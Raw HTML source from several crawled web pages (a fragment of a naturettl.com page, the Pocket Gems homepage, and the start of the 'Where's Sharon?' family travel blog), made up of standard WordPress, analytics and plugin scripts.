'https://www.naturettl.com/wp-admin/admin-ajax.php?optin-monster-ajax-route=1', nonce: '0afae15055', slugs: {"sicm9lczbpm7hkelptcv":{"slug":"sicm9lczbpm7hkelptcv","mailpoet":false},"gzmytoqsbb5wm2kvxt4q":{"slug":"gzmytoqsbb5wm2kvxt4q","mailpoet":false},"tw6bmivdpmx3otfg":{"slug":"tw6bmivdpmx3otfg","mailpoet":false}} };</script> </body> </html>
0
<!DOCTYPE html> <html class="mobile-menu-active"> <head profile="http://gmpg.org/xfn/11"> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Pocket Gems</title <!-- Favicon --> <link rel="apple-touch-icon" sizes="57x57" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-57x57.png"> <link rel="apple-touch-icon" sizes="60x60" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-60x60.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-72x72.png"> <link rel="apple-touch-icon" sizes="76x76" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-76x76.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-114x114.png"> <link rel="apple-touch-icon" sizes="120x120" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-120x120.png"> <link rel="apple-touch-icon" sizes="144x144" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-144x144.png"> <link rel="apple-touch-icon" sizes="152x152" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-152x152.png"> <link rel="apple-touch-icon" sizes="180x180" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/apple-icon-180x180.png"> <link rel="icon" type="image/png" sizes="192x192" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/android-icon-192x192.png"> <link rel="icon" type="image/png" sizes="32x32" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="96x96" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/favicon-96x96.png"> <link rel="icon" type="image/png" sizes="16x16" href="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/favicon-16x16.png"> <meta name="msapplication-TileColor" content="#ffffff"> <meta name="msapplication-TileImage" content="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/favicon/ms-icon-144x144.png"> <meta name="theme-color" content="#ffffff"> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/pocketgems.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://pocketgems.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='cookie-notice-front-css' href='https://pocketgems.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://pocketgems.com/wp-content/plugins/instagram-feed/css/sb-instagram.min.css?ver=1.11.3' type='text/css' media='all' /> <link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='app.css-css' href='https://pocketgems.com/wp-content/themes/pocketgems/assets/css/app.css?ver=1552003856' type='text/css' media='all' /> <link rel='stylesheet' id='customCss.css-css' href='https://pocketgems.com/wp-content/themes/pocketgems/assets/css/customCss.css?ver=1552003856' type='text/css' media='all' /> <script type='text/javascript' src='https://pocketgems.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://pocketgems.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var cnArgs = {"ajaxurl":"https:\/\/pocketgems.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://pocketgems.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.46'></script> <script type='text/javascript' src='https://pocketgems.com/wp-content/themes/pocketgems/assets/js/app.js?ver=1552003856'></script> <script type='text/javascript' src='https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var ajax_object = {"ajax_url":"https:\/\/pocketgems.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://pocketgems.com/wp-content/themes/pocketgems/assets/js/pocketgems_apply_job_filter.js?ver=5.1.1'></script> <script type='text/javascript' src='https://pocketgems.com/wp-content/themes/pocketgems/assets/js/custom.js?ver=5.1.1'></script> <link rel='https://api.w.org/' href='https://pocketgems.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pocketgems.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://pocketgems.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel="canonical" href="https://pocketgems.com/" /> <link rel='shortlink' href='https://pocketgems.com/' /> <link rel="alternate" type="application/json+oembed" href="https://pocketgems.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpocketgems.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://pocketgems.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpocketgems.com%2F&#038;format=xml" /> <style> </style> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ .value-text{ padding: 60px; color: #666; vertical-align: top; height: 480px; border: 8px solid #ccc; margin-bottom: 18px; margin-right: 18px; width: 49%; } .value-text:nth-child(2n+1){ margin-right: 0; } .value-text h3{ font-weight: 400; margin-top: 8px; color: #666; } h2.section-title{ font-family: Campton; font-style: normal; font-weight: 300; text-align: center; padding-top: 22px; margin-bottom: 22px; margin-top: 1.0555em !important; } .value-text h1{ color: #2babdd; font-size: 65px; margin-bottom: 0; } /*MEDIA QUERIES*/ /*iPhone 5 screen*/ @media only screen and (min-width: 300px) and (max-width : 320px) { .value-text{ width: initial; margin-right: 0; padding: 38px; } } /* Extra Small Devices, Phones */ @media only screen and (min-width: 321px) and (max-width : 480px) { .value-text{ width: initial; margin-right: 0; padding-top: 50px; } } /* Small Devices, Tablets */ @media only screen and (min-width: 481px) and (max-width : 768px) { .value-text{ width: initial; margin-right: 0; } } /* Medium Devices, Desktops */ @media only screen and (min-width: 789px) and (max-width : 991px) { .value-text{ width: 49%; margin-right: 18px; } .value-text:nth-child(2n+1){ margin-right: 0; } } /* Large Devices, Wide Screens */ @media only screen and (min-width: 992px) and (max-width : 1200px) { .value-text{ width: 49%; margin-right: 18px; } .value-text:nth-child(2n+1){ margin-right: 0; } } </style> <script type="text/javascript"> var adminAjax = "https://pocketgems.com/wp-admin/admin-ajax.php"; </script> </head> <body class="home page-template-default page page-id-5 cookies-not-set"> <div class="layout"> <header id="header" class="header header-sticky"> <div class="holder"> <div class="logo-holder"> <a class="site-logo" href="https://pocketgems.com/" title="Pocket Gems"> <img class="hidden-retina" src="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/pocket-gems-logo.png" alt="Pocket Gems"> <img class="visible-retina" src="https://pocketgems.com/wp-content/themes/pocketgems/assets/images/[email protected]" alt="Pocket Gems"> </a> <a href="#" class="menu-btn bt-menu-trigger"><span>Menu</span></a> </div> <div class="nav-holder"><ul id="menu-main-menu" class="menu menu-primary main-nav"><li id="menu-item-21" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21"><a title="About" href="https://pocketgems.com/about/" data-ps2id-api="true">About</a> <ul class="sub-menu"> <li id="menu-item-718" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-718"><a href="/about/#overview" data-ps2id-api="true">Overview</a></li> <li id="menu-item-1253" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1253"><a href="/about/#Values" data-ps2id-api="true">Values</a></li> <li id="menu-item-719" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-719"><a href="/about/#team" data-ps2id-api="true">Team</a></li> <li id="menu-item-107" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-107"><a href="/about/#news" data-ps2id-api="true">News</a></li> </ul> </li> <li id="menu-item-22" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-22"><a href="https://pocketgems.com/careers/" data-ps2id-api="true">Careers</a> <ul class="sub-menu"> <li id="menu-item-710" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-710"><a href="/careers/#overview" data-ps2id-api="true">Overview</a></li> <li id="menu-item-711" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-711"><a href="/careers/#beliefs" data-ps2id-api="true">Beliefs</a></li> <li id="menu-item-712" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-712"><a href="/careers/#teams" data-ps2id-api="true">Teams</a></li> <li id="menu-item-1015" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1015"><a href="/careers/#pocket-gems-network" data-ps2id-api="true">Pocket Gems Network</a></li> <li id="menu-item-713" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-713"><a href="/careers/#perks" data-ps2id-api="true">Perks</a></li> <li id="menu-item-714" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-714"><a href="/jobs/" data-ps2id-api="true">Open Jobs</a></li> </ul> </li> <li id="menu-item-739" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-739"><a href="https://pocketgems.com/releases/" data-ps2id-api="true">Releases</a> <ul class="sub-menu"> <li id="menu-item-1541" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1541"><a href="https://pocketgems.com/wild-beyond/" data-ps2id-api="true">Wild Beyond</a></li> <li id="menu-item-23" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-23"><a href="https://pocketgems.com/episode/" data-ps2id-api="true">Episode</a></li> <li id="menu-item-26" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-26"><a href="https://pocketgems.com/war-dragons/" data-ps2id-api="true">War Dragons</a></li> </ul> </li> <li id="menu-item-45" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-45"><a href="https://pocketgems.com/upcoming-projects/" data-ps2id-api="true">Upcoming Projects</a></li> <li id="menu-item-62" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-62"><a href="#empty-link" data-ps2id-api="true">Community</a> <ul class="sub-menu"> <li id="menu-item-63" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-63"><a target="_blank" href="http://forums.episodeinteractive.com/" data-ps2id-api="true">Episode Forums</a></li> <li id="menu-item-64" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-64"><a target="_blank" href="http://forums.wardragons.com" data-ps2id-api="true">War Dragons Forums</a></li> <li id="menu-item-65" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-65"><a target="_blank" href="http://forums.pocketgems.com" data-ps2id-api="true">Other Forums</a></li> </ul> </li> <li id="menu-item-230" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-230"><a href="#empty-link" data-ps2id-api="true">Support</a> <ul class="sub-menu"> <li id="menu-item-231" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-231"><a target="_blank" href="http://episodesupport.zendesk.com/hc/en-us" data-ps2id-api="true">Episode Support</a></li> <li id="menu-item-232" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-232"><a target="_blank" href="http://support.wardragons.com" data-ps2id-api="true">War Dragons Support</a></li> <li id="menu-item-233" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-233"><a target="_blank" href="//pocketgems.zendesk.com/hc/en-us" data-ps2id-api="true">Other Support</a></li> </ul> </li> <li id="menu-item-1022" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1022"><a href="https://pocketgems.com/we-are-gems/" data-ps2id-api="true">We Are Gems</a></li> </ul></div> </div> </header> <script> // $('a[href*="#"]') // .not('[href="#"]') // .not('[href="#0"]') // .click(function(event) { // if (location.pathname.replace(/^\//, '') == this.pathname.replace(/^\//, '') && // location.hostname == this.hostname) { // var target = $(this.hash); // target = target.length ? target : // $('[name=' + this.hash.slice(1) + ']'); // if (target.length) { // event.preventDefault(); // $('html, body') // .animate( // { scrollTop: target.offset().top }, // 1000, // function() { // var $target = $(target); // $target.focus(); // if ($target.is(":focus")) { // return false; // } else { // $target.attr('tabindex','-1'); // $target.focus(); // }; // } // ); // } // } // }); </script> <script> $( document ).ready(function() { $('.page-id-10 #overview').removeAttr('id'); $('.page-id-10 .page-header').attr('id', 'overview'); $("#header").hide(); $("#header").delay(300).slideDown('medium'); $(".page-id-10").attr('id', 'top'); $(".page-id-10 .menu-item-21 > a").attr('id', 'top'); $(".page-id-10 .menu-item-21 > a").attr("href", "#top") $("a[href='#top']").click(function() { $("html, body").animate({ scrollTop: 0 }, "slow"); return false; }); $('.bt-menu-trigger').click(function(e) { $(".searchFilters").hide(); }); $(".showFilter").click(function(e) { //$(this).parent('.box').addClass('active'); .toggleClass( "highlight" ) $(this).parent('.box').toggleClass('active').siblings().removeClass('active'); e.preventDefault(); }); $(document).click(function(event) { if(!$(event.target).closest('.box').length) { if($('.box').is(":visible")) { $('.box').removeClass('active'); } } }); $('#btnSeaerchFilters').click(function(e) { var link = $(this); $('.searchFilters .jobfilters1').slideToggle('slow', function() { if ($(this).is(':visible')) { link.text('Close Search Filters'); $(this).css( 'display', 'flex' ); } else { link.text('Open Search Filters'); $(this).removeAttr( 'style' ); } }); e.preventDefault(); }); if ($(window).width() > 640) { $('#menu2').addClass('f-nav'); } else { $('#menu2').removeClass('f-nav'); } }); </script> <div class="hero" id=""> <div class="hero-section hero-section-heavy-dark"> <div class="cell"> <div class="videoplayer"> <video poster="https://pocketgems.com/wp-content/uploads/2017/02/hero-video-poster-2.jpg" autoplay muted loop> <source src="https://pocketgems.com/wp-content/uploads/2017/02/hero-video.webm" type="video/webm"> <source src="https://pocketgems.com/wp-content/uploads/2017/02/hero-video.mp4" type="video/mp4"> </video> </div> <div class="hero-content"> <div class="container"> <h2 class="section-title"><p>Pioneering mobile games and entertainment</p> </h2> <div class="section-description">Pocket Gems began in 2009 by creating entirely new types of mobile games. We’re continuing that tradition today by developing genre-defining games and entertainment</div> <a class="btn btn-primary" href="/about">Learn more</a> </div> </div> </div> </div> </div> <div class="container"> <ul class="socials"> <li> <a class="fa fa-twitter" href="http://twitter.com/PocketGems" target="_blank"></a> </li> <li> <a class="fa fa-facebook" href="http://www.facebook.com/PocketGems" target="_blank"></a> </li> <li> <a class="fa fa-instagram" href="http://www.instagram.com/pocketgems" target="_blank"></a> </li> <li> <a class="fa fa-linkedin" href="https://www.linkedin.com/company/pocket-gems/" target="_blank"></a> </li> </ul> </div> <footer id="footer"> <div class="container"> <ul id="menu-primary-footer-menu" class="menu menu-primary"><li id="menu-item-66" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-66"><a href="https://pocketgems.com/about/" data-ps2id-api="true">About</a></li> <li id="menu-item-67" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-67"><a href="https://pocketgems.com/careers/" data-ps2id-api="true">Careers</a></li> <li id="menu-item-73" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-73"><a href="https://pocketgems.com/releases/" data-ps2id-api="true">Releases</a></li> <li id="menu-item-75" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-75"><a href="https://pocketgems.com/upcoming-projects/" data-ps2id-api="true">Upcoming Projects</a></li> <li id="menu-item-1474" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1474"><a href="https://pocketgems.com/terms-of-service/" data-ps2id-api="true">Terms of Service</a></li> <li id="menu-item-1475" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1475"><a href="https://pocketgems.com/privacy-policy/" data-ps2id-api="true">Privacy Policy</a></li> </ul> <div class="copyright">Copyright © 2011–2019 Pocket Gems, Inc. All rights reserved.</div> </div> </footer> </div> <!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://pocketgems.com/wp-admin/admin-ajax.php"; </script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":"1042934763.MTY3N2VkMA==.NWFkYjEyM2QxNzk0.NDRhOWE3ZTgzZDNjN2Y0MGYwNzI=","font_method":"svg"}; /* ]]> */ </script> <script type='text/javascript' src='https://pocketgems.com/wp-content/plugins/instagram-feed/js/sb-instagram.min.js?ver=1.11.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var mPS2id_params = {"instances":{"mPS2id_instance_0":{"selector":"a[rel='m_PageScroll2id']","autoSelectorMenuLinks":"true","scrollSpeed":1000,"autoScrollSpeed":"true","scrollEasing":"easeInOutQuint","scrollingEasing":"easeOutQuint","pageEndSmoothScroll":"true","stopScrollOnUserAction":"false","autoCorrectScroll":"false","layout":"vertical","offset":0,"highlightSelector":"","clickedClass":"mPS2id-clicked","targetClass":"mPS2id-target","highlightClass":"mPS2id-highlight","forceSingleHighlight":"false","keepHighlightUntilNext":"false","highlightByNextTarget":"false","appendHash":"false","scrollToHash":"true","scrollToHashForAll":"true","scrollToHashDelay":0,"scrollToHashUseElementData":"true","scrollToHashRemoveUrlHash":"false","disablePluginBelow":0,"adminDisplayWidgetsId":"true","adminTinyMCEbuttons":"true","unbindUnrelatedClickEvents":"false","normalizeAnchorPointTargets":"false"}},"total_instances":"1","shortcode_class":"_ps2id"}; /* ]]> */ </script> <script type='text/javascript' src='https://pocketgems.com/wp-content/plugins/page-scroll-to-id/js/page-scroll-to-id.min.js?ver=1.6.4'></script> <script type='text/javascript' src='https://pocketgems.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <div id="cookie-notice" role="banner" class="cn-bottom bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">We use cookies to improve your experience on our websites. By continuing to browse you are giving consent to cookies being used.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">OK</a><a href="https://pocketgems.com/cookie-policy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap button">Learn more</a> </div> </div> </body> </html>
0
<!DOCTYPE html><html lang="en-US" prefix="og: http://ogp.me/ns#"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="https://www.wheressharon.com/xmlrpc.php" /><link rel="shortcut icon" href="https://www.wheressharon.com/wp-content/uploads/2014/06/favicon.png" /><link type="text/css" media="all" href="https://www.wheressharon.com/wp-content/cache/autoptimize/css/autoptimize_bede8ba3fabd1080326a1620ddeb6dd4.css" rel="stylesheet" /><title>Where&#039;s Sharon? - Family Travel Blog - Travel with Kids</title><meta name="description" content="Learn how to travel smarter, cheaper and better with kids and follow our adventures as we travel with kids. Family travel tips and family travel blog."/><link rel="canonical" href="https://www.wheressharon.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="Where&#039;s Sharon? - Family Travel Blog - Travel with Kids" /><meta property="og:description" content="Learn how to travel smarter, cheaper and better with kids and follow our adventures as we travel with kids. Family travel tips and family travel blog." /><meta property="og:url" content="https://www.wheressharon.com/" /><meta property="og:site_name" content="Family Travel Blog - Travel with Kids" /><meta property="fb:app_id" content="149747035756144" /><meta property="og:image" content="https://www.wheressharon.com/wp-content/uploads/2015/03/family-travel-blog.png" /><meta property="og:image:secure_url" content="https://www.wheressharon.com/wp-content/uploads/2015/03/family-travel-blog.png" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content="Learn how to travel smarter, cheaper and better with kids and follow our adventures as we travel with kids. Family travel tips and family travel blog." /><meta name="twitter:title" content="Where&#039;s Sharon? - Family Travel Blog - Travel with Kids" /><meta name="twitter:site" content="@wheressharon" /><meta name="twitter:image" content="https://www.wheressharon.com/wp-content/uploads/2015/03/family-travel-blog.png" /><meta name="twitter:creator" content="@wheressharon" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.wheressharon.com/#website","url":"https://www.wheressharon.com/","name":"Family Travel Blog - Travel with Kids","potentialAction":{"@type":"SearchAction","target":"https://www.wheressharon.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <link rel='dns-prefetch' href='//scripts.mediavine.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Family Travel Blog - Travel with Kids &raquo; Feed" href="https://www.wheressharon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Family Travel Blog - Travel with Kids &raquo; Comments Feed" href="https://www.wheressharon.com/comments/feed/" /><link rel="alternate" type="application/rss+xml" title="Family Travel Blog - Travel with Kids &raquo; Where&#8217;s Sharon? Comments Feed" href="https://www.wheressharon.com/home/feed/" /> <script type="text/javascript" data-cfasync="false">var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-42149453-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-42149453-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); }</script> <script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"wpemoji":"https:\/\/www.wheressharon.com\/wp-includes\/js\/wp-emoji.js","twemoji":"https:\/\/www.wheressharon.com\/wp-includes\/js\/twemoji.js"}}; ( function( window, document, settings ) { var src, ready, ii, tests; /* * Create a canvas element for testing native browser support * of emoji. */ var canvas = document.createElement( 'canvas' ); var context = canvas.getContext && canvas.getContext( '2d' ); /** * Check if two sets of Emoji characters render the same. * * @param set1 array Set of Emoji characters. * @param set2 array Set of Emoji characters. * @returns {boolean} True if the two sets render the same. */ function emojiSetsRenderIdentically( set1, set2 ) { var stringFromCharCode = String.fromCharCode; // Cleanup from previous test. context.clearRect( 0, 0, canvas.width, canvas.height ); context.fillText( stringFromCharCode.apply( this, set1 ), 0, 0 ); var rendered1 = canvas.toDataURL(); // Cleanup from previous test. context.clearRect( 0, 0, canvas.width, canvas.height ); context.fillText( stringFromCharCode.apply( this, set2 ), 0, 0 ); var rendered2 = canvas.toDataURL(); return rendered1 === rendered2; } /** * Detect if the browser supports rendering emoji or flag emoji. Flag emoji are a single glyph * made of two characters, so some browsers (notably, Firefox OS X) don't support them. * * @since 4.2.0 * * @param type {String} Whether to test for support of "flag" or "emoji". * @return {Boolean} True if the browser can render emoji, false if it cannot. */ function browserSupportsEmoji( type ) { var isIdentical; if ( ! context || ! context.fillText ) { return false; } /* * Chrome on OS X added native emoji rendering in M41. Unfortunately, * it doesn't work when the font is bolder than 500 weight. So, we * check for bold rendering support to avoid invisible emoji in Chrome. */ context.textBaseline = 'top'; context.font = '600 32px Arial'; switch ( type ) { case 'flag': /* * Test for UN flag compatibility. This is the least supported of the letter locale flags, * so gives us an easy test for full support. * * To test for support, we try to render it, and compare the rendering to how it would look if * the browser doesn't render it correctly ([U] + [N]). */ isIdentical = emojiSetsRenderIdentically( [ 55356, 56826, 55356, 56819 ], [ 55356, 56826, 8203, 55356, 56819 ] ); if ( isIdentical ) { return false; } /* * Test for English flag compatibility. England is a country in the United Kingdom, it * does not have a two letter locale code but rather an five letter sub-division code. * * To test for support, we try to render it, and compare the rendering to how it would look if * the browser doesn't render it correctly (black flag emoji + [G] + [B] + [E] + [N] + [G]). */ isIdentical = emojiSetsRenderIdentically( [ 55356, 57332, 56128, 56423, 56128, 56418, 56128, 56421, 56128, 56430, 56128, 56423, 56128, 56447 ], [ 55356, 57332, 8203, 56128, 56423, 8203, 56128, 56418, 8203, 56128, 56421, 8203, 56128, 56430, 8203, 56128, 56423, 8203, 56128, 56447 ] ); return ! isIdentical; case 'emoji': /* * She's the hero Emoji deserves, but not the one it needs right now. * * To test for support, try to render a new emoji (female superhero), * then compare it to how it would look if the browser doesn't render it correctly * (superhero + female sign). */ isIdentical = emojiSetsRenderIdentically( [55358, 56760, 9792, 65039], [55358, 56760, 8203, 9792, 65039] ); return ! isIdentical; } return false; } function addScript( src ) { var script = document.createElement( 'script' ); script.src = src; script.defer = script.type = 'text/javascript'; document.getElementsByTagName( 'head' )[0].appendChild( script ); } tests = Array( 'flag', 'emoji' ); settings.supports = { everything: true, everythingExceptFlag: true }; for( ii = 0; ii < tests.length; ii++ ) { settings.supports[ tests[ ii ] ] = browserSupportsEmoji( tests[ ii ] ); settings.supports.everything = settings.supports.everything && settings.supports[ tests[ ii ] ]; if ( 'flag' !== tests[ ii ] ) { settings.supports.everythingExceptFlag = settings.supports.everythingExceptFlag && settings.supports[ tests[ ii ] ]; } } settings.supports.everythingExceptFlag = settings.supports.everythingExceptFlag && ! settings.supports.flag; settings.DOMReady = false; settings.readyCallback = function() { settings.DOMReady = true; }; if ( ! settings.supports.everything ) { ready = function() { settings.readyCallback(); }; if ( document.addEventListener ) { document.addEventListener( 'DOMContentLoaded', ready, false ); window.addEventListener( 'load', ready, false ); } else { window.attachEvent( 'onload', ready ); document.attachEvent( 'onreadystatechange', function() { if ( 'complete' === document.readyState ) { 